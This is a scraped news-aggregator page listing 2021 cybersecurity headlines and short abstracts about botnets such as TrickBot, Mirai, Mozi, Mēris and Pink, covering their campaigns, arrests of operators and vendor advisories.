The operators of TrickBot trojan are collaborating with the Shathak threat group to distribute their wares, ultimately leading to the deployment of Conti ransomware on infected machines. "The implementation of TrickBot has evolved over the years, with recent versions of TrickBot implementing malware-loading capabilities," Cybereason security analysts Aleksandar Milenkoski and Eli Salem said in a report analysing recent malware distribution campaigns undertaken by the group. "TrickBot has played a major role in many attack campaigns conducted by different threat actors, from common cybercriminals to nation-state actors." The latest report builds on a report from IBM X-Force last month, which revealed TrickBot's partnerships with other cybercrime gangs, including Shathak, to deliver proprietary malware. Also tracked under the moniker TA551, Shathak is a sophisticated cybercrime actor targeting end-users on a global scale, acting as a malware distributorThe Hacker News
November 11, 2021
Abcbot: A New Botnet in the Making Full Text
Abstract
Abcbot is slowly moving from infancy to maturity, according to researchers. The creators behind the botnet are testing various technologies with an aim to evolve the botnet with sophisticated features.Cyware Alerts - Hacker News
November 10, 2021
TrickBot teams up with Shatak phishers for Conti ransomware attacks Full Text
Abstract
A threat actor tracked as Shatak (TA551) recently partnered with the ITG23 gang (aka TrickBot and Wizard Spider) to deploy Conti ransomware on targeted systems.BleepingComputer
November 8, 2021
Experts Disclose Pink Botnet Amidst Multiple DDoS Alerts Full Text
Abstract
Researchers recently reported a massive DDoS campaign involving Pink botnet that had infected millions of devices. It is touted as the largest botnet observed in the last six years.Cyware Alerts - Hacker News
November 01, 2021
Researchers Uncover ‘Pink’ Botnet Malware That Infected Over 1.6 Million Devices Full Text
Abstract
Cybersecurity researchers disclosed details of what they say is the "largest botnet" observed in the wild in the last six years, infecting over 1.6 million devices primarily located in China, with the goal of launching distributed denial-of-service (DDoS) attacks and inserting advertisements into HTTP websites visited by unsuspecting users. Qihoo 360's Netlab security team dubbed the botnet " Pink " based on a sample obtained on November 21, 2019, owing to a large number of function names starting with "pink." Mainly targeting MIPS-based fiber routers, the botnet leverages a combination of third-party services such as GitHub, peer-to-peer (P2P) networks, and central command-and-control (C2) servers for its bots to controller communications, not to mention completely encrypting the transmission channels to prevent the victimized devices from being taken over. "Pink raced with the vendor to retain control over the infected devices, while vendorThe Hacker News
November 1, 2021
Pink Botnet infected over 1.6 Million Devices, it is one of the largest botnet ever seen Full Text
Abstract
Cybersecurity researchers uncovered a huge botnet, tracked as Pink, that already infected over 1.6 million devices most of them located in China. Qihoo 360's Netlab Cybersecurity researchers discovered a huge botnet, tracked as Pink, that already...Security Affairs
October 30, 2021
TrickBot member extradited to US faces up to 60 years in prison Full Text
Abstract
An alleged member of the TrickBot gang, the Russian national Vladimir Dunaev (aka FFX), has been extradited to the US. Vladimir Dunaev (38), a Russian national suspected to be a member of the infamous TrickBot gang, has been extradited to the U.S....Security Affairs
October 20, 2021
PurpleFox botnet variant uses WebSockets for more secure C2 communication Full Text
Abstract
Researchers warn of a new evolution of the PurpleFox botnet, operators included exploits and leverage WebSockets for C2 communication. Researchers from TrendMicro have documented a recent evolution of the PurpleFox botnet, the experts discovered...Security Affairs
October 20, 2021
New PurpleFox botnet variant uses WebSockets for C2 communication Full Text
Abstract
The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, now also leveraging WebSockets for C2 bidirectional communication.BleepingComputer
October 17, 2021
TrickBot’s FIN12 is Claiming Victims at Higher Rate Full Text
Abstract
New Mandiant report claims FIN12 has been dropping Ryuk ransomware rapidly across multiple sectors, with one in five victims in the healthcare sector. It targets organizations that have annual revenues over $300 million, with an average of almost $6 billion. The report found that the average time F ... Read MoreCyware Alerts - Hacker News
October 16, 2021
Trickbot spreads malware through new distribution channels Full Text
Abstract
TrickBot operators are back and expand the distribution channels with partnership with cybercrime affiliates. The operators behind the infamous TrickBot (ITG23 and Wizard Spider) malware have resurfaced with new distribution channels to deliver malicious...Security Affairs
October 15, 2021
Attackers Behind Trickbot Expanding Malware Distribution Channels Full Text
Abstract
The operators behind the pernicious TrickBot malware have resurfaced with new tricks that aim to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti. The threat actor, tracked under the monikers ITG23 and Wizard Spider, has been found to partner with other cybercrime gangs known Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are banking on to deliver proprietary malware, according to a report by IBM X-Force. "These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said . Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan to a modular Windows-based crimeware solution, while alsoThe Hacker News
October 15, 2021
This malware botnet gang has stolen millions with a surprisingly simple trick Full Text
Abstract
The long-running botnet known as MyKings is still in business and has raked in at least $24.7 million by using its network of compromised computers to mine for cryptocurrencies.ZDNet
October 14, 2021
Trickbot Continues to Stay Strong Despite the Recent Arrest of Gang Members Full Text
Abstract
Ever since its re-emergence following the major takedown in 2020, the operators have released new and more persistent versions of the malware to claim successful attacks on victims.Cyware Alerts - Hacker News
October 14, 2021
Freakout Botnet Unleashes a New Bunch of Attacks Full Text
Abstract
Towards the end of September 2021, researchers at Juniper Threat Labs observed new activity from FreakOut aka 3Cr0m0rPh that resulted in the takeover of Visual Tools DVR.Cyware Alerts - Hacker News
October 13, 2021
MyKings botnet still active and making massive amounts of money Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still actively spreading, making massive amounts of money in crypto, five years after it first appeared in the wild.BleepingComputer
October 13, 2021
FreakOut Botnet Turns DVRs Into Monero Cryptominers Full Text
Abstract
The new Necro Python exploit targets Visual Tool DVRs used in surveillance systems.Threatpost
October 12, 2021
Necro botnet now targets Visual Tools DVRs Full Text
Abstract
The FreakOut (aka Necro, N3Cr0m0rPh) Python botnet evolves, it now includes a recently published PoC exploit for Visual Tools DVR. Operators behind the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet have added a PoC exploit for Visual Tools DVR,...Security Affairs
October 12, 2021
FreakOut botnet now attacks vulnerable video DVR devices Full Text
Abstract
A new update to the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet has added a recently published PoC exploit for Visual Tools DVR in its arsenal to further aid in breaching systems.BleepingComputer
October 11, 2021
Ukraine Arrests Operator of DDoS Botnet with 100,000 Compromised Devices Full Text
Abstract
Ukrainian law enforcement authorities on Monday disclosed the arrest of a hacker responsible for the creation and management of a "powerful botnet" consisting of over 100,000 enslaved devices that was used to carry out distributed denial-of-service (DDoS) and spam attacks on behalf of paid customers. The unnamed individual, from the Ivano-Frankivsk region of the country, is also said to have leveraged the automated network to detect vulnerabilities in websites and break into them as well as stage brute-force attacks in order to guess email passwords. The Ukrainian police agency said it conducted a raid of the suspect's residence and seized their computer equipment as evidence of illegal activity. "He looked for customers on the closed forums and Telegram chats and payments were made via blocked electronic payment systems," the Security Service of Ukraine (SSU) said in a press statement. The payments were facilitated via WebMoney, a Russian money transfer pThe Hacker News
October 11, 2021
Security Service of Ukraine arrested a man operating a huge DDoS botnet Full Text
Abstract
Ukrainian police arrested a cybercriminal who controlled a botnet composed of 100,000 devices that was available for rent to launch DDoS attacks. Security Service of Ukraine (SSU) has arrested a hacker who controlled a DDoS botnet composed of 100,000...Security Affairs
October 8, 2021
New Zealand CERT Warns of FluBot Using New Tricks Full Text
Abstract
The infamous FluBot banking Trojan is targeting New Zealand mobile users wherein it uses different types of text-based messaging lures regarding parcel delivery and FluBot infection alert. After a successful infection, FluBot operators use the malware to steal payment information, text messages, c ... Read MoreCyware Alerts - Hacker News
September 30, 2021
WireX DDoS botnet admin charged for attacking hotel chain Full Text
Abstract
The US Department of Justice charged the admin of the WireX Android botnet for targeting an American multinational hotel chain in a distributed denial-of-service (DDoS) attack.BleepingComputer
September 29, 2021
Threat Actors Weaponize Telegram Bots to Compromise PayPal Accounts Full Text
Abstract
A campaign is stealing one-time password tokens to gain access to PayPal, Apple Pay and Google Pay, among others.Threatpost
September 28, 2021
TangleBot is Using Coronavirus Lures to Target Victims Full Text
Abstract
In a new smishing campaign, TangleBot was discovered targeting Android users in the U.S. and Canada with lures related to COVID-19 regulations and vaccine information. Malicious messages, if clicked, notify users that their Flash player has become obsolete and must be updated. U sers need to be wa ... Read MoreCyware Alerts - Hacker News
September 28, 2021
Twitter Bots Being Used to Trick Users into Making PayPal and Venmo Payments to Fraudsters’ Accounts Full Text
Abstract
The bots appear to be activated when a legitimate user asks another for their payment information, presumably discovering these tweets via a keyword search for ‘PayPal’, ‘Venmo’, or other services.The Daily Swig
September 17, 2021
Experts warn that Mirai Botnet starts exploiting OMIGOD flaw Full Text
Abstract
The Mirai botnet starts exploiting the recently disclosed OMIGOD vulnerability to compromise vulnerable systems exposed online. Threat actors behind a Mirai botnet starts exploiting a critical Azure OMIGOD vulnerability, tracked as CVE-2021-38647,...Security Affairs
September 17, 2021
Mirai Botnet Starts Exploiting OMIGOD Flaw as Microsoft Issues More Guidance Full Text
Abstract
Microsoft on Thursday published additional guidance on addressing recently disclosed vulnerabilities in the OMI framework, along with new protections to secure affected Azure VM management extensions.Security Week
September 16, 2021
Meris Botnet Creates a New Record for DDoS Attacks Full Text
Abstract
Russian internet service provider Yandex experienced one of the biggest DDoS attacks by a botnet dubbed Meris. It has infected thousands of networking devices so far. The information collected from the multiple attacks revealed that Mēris has a network of more than 30,000 devices. MikroTik has sh ... Read MoreCyware Alerts - Hacker News
September 16, 2021
Bad Bots Take the Internet by Storm Full Text
Abstract
Researchers found that there has been a constant rise in bad bots that has surpassed record-high bad bot traffic detected last year – 25.6% of all web requests.Cyware Alerts - Hacker News
September 15, 2021
MikroTik shares info on securing routers hit by massive Mēris botnet Full Text
Abstract
Latvian network equipment manufacturer MikroTik has shared details on how customers can secure and clean routers compromised by the massive Mēris DDoS botnet over the summer.BleepingComputer
September 14, 2021
MikroTik Confirms Mēris Botnet Targets Routers Compromised Years Ago Full Text
Abstract
According to MikroTik, the bots are in fact routers that were previously compromised in 2018, and which haven’t been properly secured, even if the patches released at the time were installed in a timely manner.Security Week
September 14, 2021
Mēris Bot infects MikroTik routers compromised in 2018 Full Text
Abstract
Latvian vendor MikroTik revealed that recently discovered Mēris botnet is targeting devices that were compromised three years ago. Last week, the Russian Internet giant Yandex has been targeting by the largest DDoS attack in the history of Runet,...Security Affairs
September 11, 2021
Mēris Botnet Hit Russia’s Yandex With Massive 22 Million RPS DDoS Attack Full Text
Abstract
Russian internet giant Yandex has been the target of a record-breaking distributed denial-of-service (DDoS) attack by a new botnet called Mēris. The botnet is believed to have pummeled the company's web infrastructure with millions of HTTP requests, before hitting a peak of 21.8 million requests per second (RPS), dwarfing a recent botnet-powered attack that came to light last month, bombarding an unnamed Cloudflare customer in the financial industry with 17.2 million RPS. Russian DDoS mitigation service Qrator Labs, which disclosed details of the attack on Thursday, called Mēris — meaning "Plague" in the Latvian language — a "botnet of a new kind." "It is also clear that this particular botnet is still growing. There is a suggestion that the botnet could grow in force through password brute-forcing, although we tend to neglect that as a slight possibility. That looks like some vulnerability that was either kept secret before the massive campaign&#The Hacker News
September 9, 2021
A new botnet named Mēris is behind massive DDoS attack that hit Yandex Full Text
Abstract
The massive DDoS attack that has been targeting the internet giant Yandex was powered b a completely new botnet tracked as Mēris. The Russian Internet giant Yandex has been targeting by the largest DDoS attack in the history of Runet, the Russian...Security Affairs
September 09, 2021
New Mēris botnet breaks DDoS record with 21.8 million RPS attack Full Text
Abstract
A new distributed denial-of-service (DDoS) botnet that kept growing over the summer has been hammering Russian internet giant Yandex for the past month, the attack peaking at the unprecedented rate of 21.8 million requests per second.BleepingComputer
September 7, 2021
39% of all internet traffic is from bad bots Full Text
Abstract
These bad bots include both basic web scrapers and attack scripts, as well as advanced persistent bots that try to evade defenses and attempt to perform their malicious activities under the radar.Help Net Security
September 7, 2021
Authorities Arrest Another TrickBot Gang Member in South Korea Full Text
Abstract
A hacker known only as “Mr. A” was picked up by authorities at a South Korean airport after getting stuck in the country due to COVID-19 travel restrictions.Threatpost
September 6, 2021
TrickBot gang developer arrested at the Seoul international airport Full Text
Abstract
A Russian man accused of being a member of the infamous TrickBot gang was arrested while trying to leave South Korea A Russian man accused of being a member of the TrickBot gang was arrested last week at the Seoul international airport. The man has remained...Security Affairs
September 6, 2021
A Quick Analysis of QakBot, a Decade-Old Threat Full Text
Abstract
Kaspersky provided a detailed technical analysis of QakBot, a decade-old Trojan that is active since 2007. It also underlines the stats of victims. In the first seven months of this year, Kaspersky spotted 181,869 attempts to download or execute QakBot. Experts say one must track its activitie ... Read MoreCyware Alerts - Hacker News
September 5, 2021
Authors Detained but Mozi Botnet will Continue to Lurk, Here’s Why Full Text
Abstract
Despite authors being detained, Mozi botnet is unstoppable. The botnet uses a peer-to-peer network structure that contributes as a major factor to helps the malware propagate even when some of its nodes go down . New findings from a new report reveal why Mozi, which accounted for 1.55 million infe ... Read MoreCyware Alerts - Hacker News
September 02, 2021
Chinese Authorities Arrest Hackers Behind Mozi IoT Botnet Attacks Full Text
Abstract
The operators of the Mozi IoT botnet have been taken into custody by Chinese law enforcement authorities, nearly two years after the malware emerged on the threat landscape in September 2019. News of the arrest, which originally happened in June, was disclosed by researchers from Netlab, the network research division of Chinese internet security company Qihoo 360, earlier this Monday, detailing its involvement in the operation. "Mozi uses a P2P [peer-to-peer] network structure, and one of the 'advantages' of a P2P network is that it is robust, so even if some of the nodes go down, the whole network will carry on, and the remaining nodes will still infect other vulnerable devices, that is why we can still see Mozi spreading," said Netlab, which spotted the botnet for the first time in late 2019. The development also comes less than two weeks after Microsoft Security Threat Intelligence Center revealed the botnet's new capabilities that enable it to interThe Hacker News
September 1, 2021
Mozi infections will slightly decrease but it will stay alive for some time to come Full Text
Abstract
The Mozi botnet continues to spread despite the arrest of its alleged author and experts believe that it will run for many other years. Mozi is an IoT botnet that borrows the code from Mirai variants and the Gafgyt malware,...Security Affairs
August 30, 2021
Phorpiex botnet shuts down, source code goes up for sale Full Text
Abstract
The ad, posted by an individual earlier linked to the botnet’s operation, claims that none of its two authors are involved in running the botnet, hence the reason they decided to sell its source code.The Record
August 29, 2021
DirtyMoe Botnet Returns with New Tricks Full Text
Abstract
A new DirtyMoe botnet variant was discovered with major modifications in the form of anti-forensic, anti-debugging, and anti-tracking capabilities. The attackers use VMProtect and their own encryption algorithm to evade detection. Besides vulnerability management solutions, enterprises must en ... Read MoreCyware Alerts - Hacker News
August 29, 2021
LokiBot Uses Old-but-Tested Tricks to Lure Victims Full Text
Abstract
Trend Micro has identified a new malware distribution campaign delivering LokiBot banking trojan using multiple old yet effective tactics. The customers were being targeted via emails masquerading as an order invoice, with a PDF file attached. Its critical that organizations patch vulnera ... Read MoreCyware Alerts - Hacker News
August 28, 2021
Phorpiex botnet shuts down and authors put source code for sale Full Text
Abstract
Crooks behind the Phorpiex botnet have shut down their operations and put the source code for sale on the dark web. The criminal organization behind the Phorpiex botnet have shut down their operations and put the source code of the bot for sale on a cybercrime...Security Affairs
August 25, 2021
Mirai Botnet Variant Targeting Vulnerabilities in Realtek Devices Full Text
Abstract
Mirai-based botnet operators were found exploiting a new security flaw in the Realtek SDK, impacting hundreds of thousands of devices worldwide. The vulnerabilities were spotted in Realtek chipsets just two days ago. Vulnerable device owners are recommended to apply the patch as soon as possible.Cyware Alerts - Hacker News
August 25, 2021
Network Gateways are on the Radar of Mozi Full Text
Abstract
Mozi, a P2P botnet known to target IoT products, has gained new capabilities to aim at network gateways created by Huawei, Netgear, and ZTE. Mozi propagates by exploiting weak and default remote access passwords and unpatched vulnerabilities. The key security recommendation is always to use a stron ... Read MoreCyware Alerts - Hacker News
August 25, 2021
DirtyMoe Botnet Returns With Undetectable Threat Profile Full Text
Abstract
DirtyMoe’s attack chain begins with the attackers attempting to gain admin privileges on a target’s Windows machine. It often relies on the PurpleFox exploit kit to misuse EternalBlue.Security Intelligence
August 24, 2021
Realtek SDK flaws exploited to deliver Mirai bot variant Full Text
Abstract
Researchers warn that threat actors are actively exploiting Realtek SDK vulnerabilities since their technical details were publicly disclosed. Researchers from SAM Seamless Network warn that threat actors are actively exploiting Realtek SDK vulnerabilities since...Security Affairs
August 23, 2021
Botnet targets hundreds of thousands of devices using Realtek SDK Full Text
Abstract
A Mirai-based botnet now targets a critical vulnerability in the software SDK used by hundreds of thousands of Realtek-based devices, encompassing 200 models from at least 65 vendors, including Asus, Belkin, D-Link, Netgear, Tenda, ZTE, and Zyxel.BleepingComputer
August 23, 2021
Report Shows Even More Similarities Between Diavol Ransomware and TrickBot Full Text
Abstract
The new ransomware family is called Diavol and it is believed to have connections to the Wizard Spider threat actor as the researchers discovered a few similarities in the operation mode employed by the malware.Heimdal Security
August 20, 2021
Mozi IoT Botnet Now Also Targets Netgear, Huawei, and ZTE Network Gateways Full Text
Abstract
Mozi, a peer-to-peer (P2P) botnet known to target IoT devices, has gained new capabilities that allow it to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE, according to new findings. "Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks," researchers at Microsoft Security Threat Intelligence Center and Section 52 at Azure Defender for IoT said in a technical write-up. "By infecting routers, they can perform man-in-the-middle (MITM) attacks—via HTTP hijacking and DNS spoofing—to compromise endpoints and deploy ransomware or cause safety incidents in OT facilities." First documented by Netlab 360 in December 2019, Mozi has a history of infecting routers and digital video recorders in order to assemble them into an IoT botnet, which could be abused for launching distributed denial-of-service (DDoS) attacks, data exfiltration, and payload executionThe Hacker News
August 20, 2021
Mozi P2P Botnet also targets Netgear, Huawei, and ZTE devices Full Text
Abstract
Mozi botnet continues to evolve, its authors implemented new capabilities to target Netgear, Huawei, and ZTE network gateways. Microsoft researchers reported that the Mozi botnet was improved by implementing news capabilities to target network gateways...Security Affairs
August 11, 2021
The cost of unwanted bot traffic - up to $250M a year Full Text
Abstract
During the pandemic, online presence has become crucial for retail businesses. It has also led to the challenge of evasive malicious bots that are now leaching off of already vulnerable businesses.Cyber News
August 9, 2021
StealthWorker botnet targets Synology NAS devices to drop ransomware Full Text
Abstract
Taiwanese vendor Synology has warned customers that the StealthWorker botnet is targeting their NAS devices to deliver ransomware. Taiwan-based vendor Synology has warned customers that the StealthWorker botnet is conducting brute-force attacks in an attempt...Security Affairs
August 4, 2021
LemonDuck Botnet Evolves to Allow Hands-on-Keyboard Attacks Full Text
Abstract
A relatively new term in the cybersecurity world, hands-on-keyboard attacks are when threat actors stop using automated scripts and manually log into an infected system to execute commands themselves.The Record
August 4, 2021
Social engineering goes automatic: New robocall bot on Telegram can trick you into giving up your password Full Text
Abstract
The so-called OTP Bot can trick victims into sending criminals passwords to their bank accounts, email, and other online services – all without any direct interaction with the victim.Cyber News
August 01, 2021
Bot protection now generally available in Azure Web Application Firewall Full Text
Abstract
Microsoft has announced that the Web Application Firewall (WAF) bot protection feature has reached general availability on Azure on Application Gateway starting this week.BleepingComputer
July 23, 2021
Estonian hacker Pavel Tsurkan pleads guilty for operating a proxy botnet. Full Text
Abstract
Estonian hacker Pavel Tsurkan has pleaded guilty in a United States court to the counts of computer fraud and of creating and operating a proxy botnet. The Estonian national Pavel Tsurkan has pleaded guilty in a United States court to two counts of computer...Security Affairs
July 21, 2021
Why Current Botnet Takedown Jurisprudence Should Not Be Replicated Full Text
Abstract
Restraining orders and other equitable mechanisms of relief were never designed to address such a unique challenge as global cybercrime.Lawfare
July 19, 2021
TeaBot Trojan Striking Harder, Targeting More European Banks Full Text
Abstract
Prodaft researchers are warning of Android banking botnet dubbed Teabot or Anasta that has been targeting the customers of 60 banks in Europe and is growing rapidly. Moreover, the inclusion of several sophisticated tricks such as targeting crypto wallets and abusing Accessibility Services makes it ... Read MoreCyware Alerts - Hacker News
July 17, 2021
Trickbot Thrives Again with Virtual Network Computing Module Full Text
Abstract
Recently, Trickbot actors were found adding new Virtual Network Computing (VNC) module into its arsenal that helps an actor monitor high-profile targets and gathers intelligence from them. The frequent developments in Trickbot’s lifecycle and an accelerated rate of propagation highlight the actual ... Read MoreCyware Alerts - Hacker News
July 14, 2021
Trickbot updates its VNC module for high-value targets Full Text
Abstract
The Trickbot botnet malware that often distributes various ransomware strains, continues to be the most prevalent threat as its developers update the VNC module used for remote control over infected systems.BleepingComputer
July 8, 2021
How Fake Accounts and Sneaker-Bots Took Over the Internet Full Text
Abstract
Jason Kent, hacker-in-residence at Cequence Security, discusses fake online accounts, and the fraud they carry out on a daily basis.Threatpost
July 7, 2021
Mirai_ptea: The Latest Mirai-Inspired Botnet Full Text
Abstract
Cybersecurity researchers have spotted a new Mirai-inspired botnet, mirai_ptea, abusing an undisclosed vulnerability in KGUARD's Digital Video Recorders (DVR). Mirai’s source code was leaked several years ago, and since then multiple variants are still getting spotted on the threat landscape.Cyware Alerts - Hacker News
July 6, 2021
Trickbot Braces Up For Another Innings Full Text
Abstract
Kryptos Logic Threat Intelligence researchers have revealed a new report about a new TrickBot modulel that bears precise resemblance to the Zeus attack pattern.Cyware Alerts - Hacker News
July 05, 2021
TrickBot Botnet Found Deploying A New Ransomware Called Diavol Full Text
Abstract
Threat actors behind the infamous TrickBot malware have been linked to a new ransomware strain named "Diavol," according to the latest research. Diavol and Conti ransomware payloads were deployed on different systems in a case of an unsuccessful attack targeting one of its customers earlier this month, researchers from Fortinet's FortiGuard Labs said last week. TrickBot, a banking Trojan first detected in 2016, has been traditionally a Windows-based crimeware solution, employing different modules to perform a wide range of malicious activities on target networks, including credential theft and conduct ransomware attacks. Despite efforts by law enforcement to neutralize the bot network, the ever-evolving malware has proven to be a resilient threat , what with the Russia-based operators — dubbed " Wizard Spider " — quickly adapting new tools to carry out further attacks. Diavol is said to have been deployed in the wild in one incident to date. The sourcThe Hacker News
July 02, 2021
New Mirai-Inspired Botnet Could Be Using Your KGUARD DVRs in Cyber Attacks Full Text
Abstract
Cybersecurity researchers on Thursday revealed details about a new Mirai-inspired botnet called "mirai_ptea" that leverages an undisclosed vulnerability in digital video recorders (DVR) provided by KGUARD to propagate and carry out distributed denial-of-service (DDoS) attacks. Chinese security firm Netlab 360 pinned the first probe against the flaw on March 23, 2021, before it detected active exploitation attempts by the botnet on June 22, 2021. The Mirai botnet, since emerging on the scene in 2016, has been linked to a string of large-scale DDoS attacks, including one against DNS service provider Dyn in October 2016, causing major internet platforms and services to remain inaccessible to users in Europe and North America. Since then, numerous variants of Mirai have sprung up on the threat landscape, in part due to the availability of its source code on the Internet. Mirai_ptea is no exception. Not much has been disclosed about the security flaw in an attThe Hacker News
July 1, 2021
Alert! Mirai Botnet is Active and So are its Dozen Other Variants Full Text
Abstract
Mirai botnet has been a constant threat since its emergence in 2016. A recent report by McAfee attributed the surge in attacks on IoT (55%) and Linux (38%) systems to Mirai and its variants.Cyware Alerts - Hacker News
July 1, 2021
Mirai_ptea Botnet is Exploiting Undisclosed KGUARD DVR Vulnerability Full Text
Abstract
Researchers from 360 Netlab discovered a variant of the Mirai botnet named mirai_ptea was found exploiting a previously unknown vulnerability in KGUARD DVR for launching DDoS attacks.Netlab
June 22, 2021
DirtyMoe botnet infected 100,000+ Windows systems in H1 2021 Full Text
Abstract
DirtyMoe is a Windows botnet that is rapidly growing, it passed from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. Researchers from Avast are warning of the rapid growth of the DirtyMoe botnet (PurpleFox, Perkiler,...Security Affairs
June 21, 2021
50% of misconfigured containers hit by botnets in under an hour Full Text
Abstract
Aqua Security reported that data it collected from honeypots protecting containers over a six-month period revealed that 50% of misconfigured Docker APIs are attacked by botnets within 56 minutes of being set up.SCMagazine
June 16, 2021
US convicts Russian national behind Kelihos botnet crypting service Full Text
Abstract
Russian national Oleg Koshkin was convicted for charges related to the operation of a malware crypter service used by the Kelihos botnet to obfuscate malware payloads and evade detection.BleepingComputer
June 5, 2021
TeaBot and FluBot - Thugs in Banker’s Disguise Full Text
Abstract
Security researchers have found a new batch of malicious Android applications trying to lure victims by impersonating popular applications. The targeted applications were mostly from renowned financial institutions while spreading TeaBot and FluBot trojans. The use of fake or lookalike malicious a ... Read MoreCyware Alerts - Hacker News
June 4, 2021
Necro Python bot now enhanced with new VMWare, server exploits Full Text
Abstract
Operators behind the Necro Python botnet have added new features to their bot, including VMWare and server exploits. Experts from Cisco Talos have recently observed a new Necro Python bot campaign and noticed that its developers have improved its capabilities. The...Security Affairs
May 25, 2021
Phorpiex Botnet is Still Active and Thriving Full Text
Abstract
Decade-old botnets continue to adapt to the current threat landscape, as seen in the case of wide-ranging malicious activities of the resilient Phorpiex botnet. Though, for many years, the Phopiex botnet has had the same internal infrastructure with C2 mechanisms and source code.Cyware Alerts - Hacker News
May 21, 2021
Simps Botnet Uses Gafgyt Modules Full Text
Abstract
Researchers uncovered a new botnet malware purposed for DDoS attacks on gaming and other sectors. The malware operators created a Discord server and YouTube channel for its demonstration.Cyware Alerts - Hacker News
May 21, 2021
Ransomware-spreading Phorpiex Botnet Disables Security Solutions to Maintain Persistence Full Text
Abstract
Microsoft notes that from December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan being the top targeted countries.ZDNet
May 19, 2021
Keksec Cybergang Debuts Simps Botnet for Gaming DDoS Full Text
Abstract
The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.Threatpost
May 18, 2021
Discovery of Simps Botnet Leads To Ties to Keksec Group Full Text
Abstract
Uptycs' threat research team discovered a new botnet, tracked as Simps botnet, attributed to Keksec group, which is focused on DDOS activities Uptycs' threat research team has discovered a new Botnet named ‘Simps’ attributed to Keksec group primarily...Security Affairs
May 14, 2021
TeaBot Trojan: Active and Performing Fraudulent Activities Full Text
Abstract
Cybersecurity researchers reported a new Android banking trojan that hijacks user credentials and text messages to distribute fraudulent activities targeting banks in Spain, Germany, the Netherlands, Belgium, and Italy.Cyware Alerts - Hacker News
May 7, 2021
Bot Attacks a Top Cybersecurity Concern Full Text
Abstract
Majority of security leaders view bot mitigation as a top priorityInfosecurity Magazine
May 6, 2021
A taste of the latest release of QakBot Full Text
Abstract
A taste of the latest release of QakBot – one of the most popular and mediatic trojan bankers active since 2007. The malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot is a banking trojan that has been made headlines since 2007. This...Security Affairs
May 5, 2021
New Cryptominer Spotted, Attacks Using Windows and Linux Bots Full Text
Abstract
The Sysrv-hello crytpojacking botnet actively scans for vulnerable Windows and Linux enterprise servers and infects them with Monero miner, as well as self-propagating malware payloads.Cyware Alerts - Hacker News
May 4, 2021
Massive Botnet Infected Internet TV Users, Now Taken Down Full Text
Abstract
Dubbed Pareto CTV botnet, the botnet was made of almost a million infected Android devices and imitated the activity of millions of people watching ads on their smart devices.Cyware Alerts - Hacker News
May 1, 2021
Gafgyt Learns from Mirai Botnet Full Text
Abstract
The reuse of the Mirai source code has enhanced the capability of Gafgyt to carry out DDoS attacks in various ways.Cyware Alerts - Hacker News
April 26, 2021
When Should U.S. Cyber Command Take Down Criminal Botnets? Full Text
Abstract
The Trickbot takedown and such military operations are a good idea only in cases that meet a five-part test of imminence, severity, overseas focus, nation-state adversary, and military as a last-ish resort.Lawfare
April 26, 2021
Bye Bye Emotet, law enforcement pushed the uninstall code via the botnet Full Text
Abstract
European law enforcement has conducted an operation aimed at performing a mass-sanitization of computers infected with the infamous Emotet Windows malware. European law enforcement agencies automatically wiped the infamous Emotet malware from infected...Security Affairs
April 26, 2021
Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws Full Text
Abstract
Attackers are exploiting the ProxyLogon flaws in Microsoft Exchange to recruit machines in a cryptocurrency botnet tracked as Prometei. Experts from the Cybereason Nocturnus Team have investigated multiple incidents involving the Prometei Botnet....Security Affairs
April 24, 2021
A new Linux Botnet abuses IaC Tools to spread and other emerging techniques Full Text
Abstract
A new Linux botnet uses Tor through a network of proxies using the Socks5 protocol, abuses legitimate DevOps tools, and other emerging techniques. Researchers from Trend Micro have spotted a new Linux botnet employing multiple emerging techniques...Security Affairs
April 23, 2021
New Golang-based Sysrv Cryptomining Botnet Targets Popular Enterprise Applications Full Text
Abstract
As analyzed in reports from security researchers at Alibaba’s Aliyun, Juniper, and Lacework, Sysrv’s internal architecture follows the classic makeup of 99% of most botnets today.The Record
April 23, 2021
Last Chance for Forensics Teams Ahead of Emotet Sunday Deadline Full Text
Abstract
Notorious botnet will be removed from global machines at the weekendInfosecurity Magazine
April 23, 2021
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools Full Text
Abstract
As Linux attracts more attention from malicious actors, researchers have seen threats evolving — abusing services like Ngrok and using functions to hunt and kill other competing malware.Trend Micro
April 23, 2021
Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers Full Text
Abstract
Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research. "Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more," Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings. First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and "increase the amount of systems participating in its Monero-mining pool." "Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted inThe Hacker News
April 22, 2021
Botnet backdoors Microsoft Exchange servers, mines cryptocurrency Full Text
Abstract
Unpatched Microsoft Exchange servers are being targeted by the Prometei botnet and added to its operators' army of Monero (XMR) cryptocurrency mining bots.BleepingComputer
April 22, 2021
Massive Android Botnet Uses Spoofed Apps to Serve Hundreds of Millions of Fraud Ad Requests on Smart TVs Full Text
Abstract
The sophisticated mobile botnet, dubbed Pareto, is made up of nearly a million infected mobile Android devices pretending to be millions of people watching ads on smart TVs and other devices.Security Week
